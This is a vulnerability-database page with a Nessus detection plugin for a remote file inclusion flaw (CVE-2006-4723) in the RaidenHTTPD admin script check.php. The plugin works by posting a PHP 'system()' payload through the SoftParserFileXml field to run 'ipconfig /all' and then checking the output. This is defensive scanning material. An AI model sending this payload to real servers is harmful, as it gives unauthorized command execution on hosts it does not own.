| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| RaidenHTTPD SoftParserFileXml Parameter Remote File Inclusion | 12 Sep 200600:00 | – | nessus | |
| CVE-2006-4723 | 12 Sep 200616:00 | – | cve | |
| CVE-2006-4723 | 12 Sep 200616:00 | – | cvelist | |
| EUVD-2006-4710 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-4723 | 12 Sep 200616:07 | – | nvd |
| Source | Link |
|---|---|
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(22317);
script_version("1.23");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2006-4723");
script_bugtraq_id(19918);
script_xref(name:"EDB-ID", value:"2328");
script_name(english:"RaidenHTTPD check.php SoftParserFileXml Parameter Remote File Inclusion");
script_summary(english:"Tries to run a command with RaidenHTTPD");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is susceptible to a
remote file include attack.");
script_set_attribute(attribute:"description", value:
"The remote host is running RaidenHTTPD, a web server for Windows.
The version of RaidenHTTPD on the remote host fails to sanitize
user-supplied input to the 'SoftParserFileXml' of the
'/raidenhttpd-admin/slice/check.php' script before using it to include
PHP code. An unauthenticated attacker may be able to exploit this issue
to view arbitrary files or to execute arbitrary PHP code on the remote
host, subject to the privileges of the user under which the application
runs, LOCAL SYSTEM by default.");
script_set_attribute(attribute:"solution", value:"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:raidenhttpd:raidenhttpd");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
# Unless we're paranoid, make sure the banner indicates it's RaidenHTTPD.
if (report_paranoia < 2)
{
banner = get_http_banner(port:port);
if (!banner || "Server: RaidenHTTPD" >!< banner) exit(0);
}
# Make sure the affected script exists.
url = "/raidenhttpd-admin/slice/check.php";
r = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(r)) exit(0);
# If it does...
#
# nb: the script doesn't respond when called directly.
if (r[0] =~ "^HTTP/.* 200 OK")
{
# Try to exploit the flaw to execute a command.
cmd = "ipconfig /all";
bound = "bound";
boundary = string("--", bound);
postdata = string(
boundary, "\r\n",
'Content-Disposition: form-data; name="SoftParserFileXml"; filename="', SCRIPT_NAME, '";', "\r\n",
"Content-Type: image/jpeg;\r\n",
"\r\n",
'<?php system("', cmd, '"); die; ?>\r\n',
boundary, "--", "\r\n"
);
r = http_send_recv3(method: "POST", item: url, port: port,
content_type: "multipart/form-data; boundary="+bound,
data: postdata );
if (isnull(r)) exit(0, "The web server did not answer");
res = r[2];
# There's a problem if it looks like the output of ipconfig.
if ("Windows IP Configuration" >< res)
{
if (report_verbosity < 1) report = desc;
else report = string(
"Nessus was able to execute the command '", cmd, "' on the remote\n",
"host, which produced the following output :\n",
"\n",
res
);
security_warning(port:port, extra:report);
exit(0);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation